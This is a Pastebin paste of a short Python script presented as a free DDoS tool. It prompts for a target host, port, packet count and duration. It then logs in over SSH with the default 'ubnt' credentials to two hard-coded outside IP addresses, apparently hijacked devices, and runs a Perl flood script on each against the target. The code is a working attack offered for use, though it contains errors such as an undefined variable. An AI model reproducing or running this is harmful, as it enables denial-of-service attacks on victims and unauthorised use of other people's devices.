Guest User

FREE!!!!!!! lol python ddos... By Zveu

a guest
Mar 7th, 2016
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.93 KB | None | 0 0
  1. #import Zveu's nice ass xD
  2. import sys, os, socket, threading
  3. import paramiko, base64 #pip install paramiko or try python pip install paramiko
  4. ip = raw_input("IP/Host/URL: ")
  5. llport = raw_input("Port: ")
  6. llpacket = raw_input("Packets: ")
  7. time = raw_input("Time(Plz no more than 3600): ")
  8. blockSize=65536*16
  9. host = "101.100.185.119"
  10. host1 = "101.100.185.117"
  11.  
  12. port = 22
  13. buf = 1024
  14. addr =(host2,port)
  15. user = "ubnt"
  16. passwrd = "ubnt"
  17. t = paramiko.Transport(host)
  18. t1 = paramiko.Transport(host1)
  19.  
  20. t.connect(username=user, password=passwrd)
  21. t1.connect(username=user, password=passwrd)
  22.  
  23. chan = t.open_session()
  24. chan1 = t1.open_session()
  25.  
  26.  
  27. chan.exec_command('perl dgh.pl ' +ip+ ' ' +llport+ ' ' +llpacket+ ' ' +time+ '')
  28. chan1.exec_command('perl dgh.pl ' +ip+ ' ' +llport+ ' ' +llpacket+ ' ' +time+ '')
  29. print ("Attack Sent")
  30. for line in chan.makefile('r+'):
  31.    print line.strip()
  32. t.close()
  33. chan.close
  34. t1.close()
  35. chan1.close
Add Comment
Please, Sign In to add comment